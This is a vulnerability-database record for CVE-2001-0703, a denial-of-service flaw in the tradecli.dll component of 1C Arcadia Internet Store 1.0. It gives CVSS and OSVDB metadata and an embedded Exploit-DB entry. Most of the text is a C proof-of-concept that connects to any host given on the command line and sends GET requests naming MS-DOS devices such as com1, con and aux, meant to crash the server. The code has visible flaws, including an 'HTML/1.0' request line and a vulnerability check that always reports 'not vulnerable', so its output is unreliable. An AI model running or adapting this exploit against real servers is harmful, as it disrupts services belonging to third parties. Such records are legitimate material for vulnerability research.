ID CVE-2001-0703 Type cve Reporter cve@mitre.org Modified 2017-12-19T02:29:00
Description
tradecli.dll in Arcadia Internet Store 1.0 allows a remote attacker to cause a denial of service via a URL request with an MS-DOS device name in the template parameter.
{"osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 6739\n[CVE-2001-0703](https://vulners.com/cve/CVE-2001-0703)\nBugtraq ID: 2905\n", "modified": "2001-06-21T00:00:00", "published": "2001-06-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:13055", "id": "OSVDB:13055", "title": "Arcadia Internet Store tradecli.dll DOS Device Name DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:20:43", "bulletinFamily": "exploit", "description": "1C: Arcadia Internet Store 1.0 Denial of Service Vulnerability. CVE-2001-0703. Dos exploit for windows platform", "modified": "2001-06-21T00:00:00", "published": "2001-06-21T00:00:00", "id": "EDB-ID:20949", "href": "https://www.exploit-db.com/exploits/20949/", "type": "exploitdb", "title": "1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/2905/info\r\n\r\n1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.\r\n\r\nOne of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.\r\n\r\nRemote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur. \r\n\r\n/*\r\n Proof of conecpt code by linux^sex\r\n Exploit provided by NERF Security gr0up\r\n Attempts to crash any server you specify\r\n running Arcadia 1C: Arcadia Internet Store 1.0\r\n on Windows NT/2000 fully integratable with \r\n 1C: Enterprise, another popular Russian \r\n web-commerce utility. \r\n\r\n code request dos devices, such as 'con', 'com1', 'com2', etc. \r\n When 'tradecli.dll' attempts to open these files a denial of \r\n service may occur. Vendor has not released any patches as of yet\r\n NOTE: I take no responsibility for the mis-use of this code\r\n*/\r\n \r\n\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n#define PORT 80\r\nchar death[]= {\r\n \"GET /scripts/tradecli.dll?template=com1 HTML/1.0\\n\\n\\n\"\r\n \"GET /scripts/tradecli.dll?template=com2 HTML/1.0\\n\\n\\n\"\r\n \"GET /scripts/tradecli.dll?template=com3 HTML/1.0\\n\\n\\n\"\r\n \"GET /scripts/tradecli.dll?template=con HTML/1.0\\n\\n\\n\"\r\n \"GET /scripts/tradecli.dll?template=prn HTML/1.0\\n\\n\\n\"\r\n \"GET /scripts/tradecli.dll?template=aux HTML/1.0\\n\\n\\n\"\r\n};\r\n\r\nint main(int argc, char *argv[]) {\r\n int sockfd;\r\n char buf[1024];\r\n struct hostent *ha;\r\n struct sockaddr_in sa;\r\n if (argv[1] == NULL) {\r\n printf(\"Usage: %s <HOST>\\n\", argv[0]);\r\n printf(\"Proof of concecpt code by linux^sex\\n\");\r\n printf(\"contact me at linuxsex@crackdealer.com\\n\");\r\n printf(\"props to r00t-access crew\\n\");\r\n printf(\"visit us at www.r00taccess.ath.cx\\n\");\r\n exit(0);\r\n }\r\n\r\n if (!(ha = gethostbyname (argv[1])))\r\n perror (\"gethostbyname\");\r\n\r\n bzero (&sa, sizeof (sa));\r\n bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);\r\n sa.sin_family = ha->h_addrtype;\r\n sa.sin_port = htons (PORT);\r\n \r\n if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {\r\n perror (\"socket\");\r\n exit (1);\r\n }\r\n printf(\"Connecting\\n\");\r\n if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {\r\n perror (\"connect\");\r\n exit (1);\r\n }\r\n printf(\"Connected...\\nrequesting dos devices\\n\");\r\n send(sockfd, death, sizeof(death), 0);\r\n read(sockfd, buf, 1024, 0);\r\n if (buf != NULL) {\r\n printf(\"Host is not vulnerable\\n\");\r\n close(sockfd);\r\n }\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20949/"}]}